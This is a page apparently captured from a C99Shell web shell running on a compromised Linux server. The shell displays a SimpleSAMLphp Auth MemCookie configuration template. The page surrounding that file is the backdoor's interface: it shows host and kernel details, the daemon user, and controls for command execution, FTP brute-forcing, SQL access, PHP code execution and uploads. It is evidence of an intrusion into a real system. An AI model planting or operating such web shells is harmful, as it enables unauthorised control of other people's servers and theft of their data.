!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_tdfonline/php/3ros/simplesamlphp/config-templates/   drwxr-xr-x
Free 13.83 GB of 61.93 GB (22.34%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     authmemcookie.php (2.36 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This is the configuration file for the Auth MemCookie example.
 */

$config = array(

    
/*
     * What type of login Auth MemCookie will use.
     * Can be either 'authsource', 'saml2' or 'shib13'.
     *
     * For backwards compatibility, the default value if unset is 'saml2'.
     * New installations should use 'authsource'.
     */
    
'loginmethod' => 'authsource',

    
/*
     * The authentication source that should be used.
     *
     * This must be one of the authentication sources configured in config/authsources.php.
     */
    
'authsource' => 'default-sp',

    
/*
     * This is the name of the cookie we should save the session id in. The value of this option must match the
     * Auth_memCookie_CookieName option in the Auth MemCookie configuration. The default value is 'AuthMemCookie'.
     *
     * Default:
     *  'cookiename' => 'AuthMemCookie',
     */
    
'cookiename' => 'AuthMemCookie',

    
/*
     * This option specifies the name of the attribute which contains the username of the user. It must be set to
     * a valid attribute name.
     *
     * Examples:
     *  'username' => 'uid', // LDAP attribute for user id.
     *  'username' => 'mail', // LDAP attribute for email address.
     *
     * Default:
     *  No default value.
     */
    
'username' => NULL,

    
/*
     * This option specifies the name of the attribute which contains the groups of the user. Set this option to
     * NULL if you don't want to include any groups.
     *
     * Example:
     *  'groups' => 'edupersonaffiliation',
     *
     * Default:
     *  'groups' => NULL,
     */
    
'groups' => NULL,

    
/*
     * This option contains the hostnames or IP addresses of the memcache servers where we should store the
     * authentication information. Separator is a comma. This option should match the address part of the
     * Auth_memCookie_Memcached_AddrPort option in the Auth MemCookie configuration.
     *
     * Examples:
     *  'memcache.host' => '192.168.93.52',
     *  'memcache.host' => 'memcache.example.org',
     *  'memcache.host' => 'memcache1.example.org,memcache2.example.org'
     *
     * Default:
     *  'memcache.host' => '127.0.0.1',
     */
    
'memcache.host' => '127.0.0.1',

    
/*
     * This option contains the port number of the memcache server where we should store the
     * authentication information. This option should match the port part of the
     * Auth_memCookie_Memcached_AddrPort option in the Auth MemCookie configuration.
     *
     * Default:
     *  'memcache.port' => 11211,
     */
    
'memcache.port' => 11211,

);

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.6019 ]--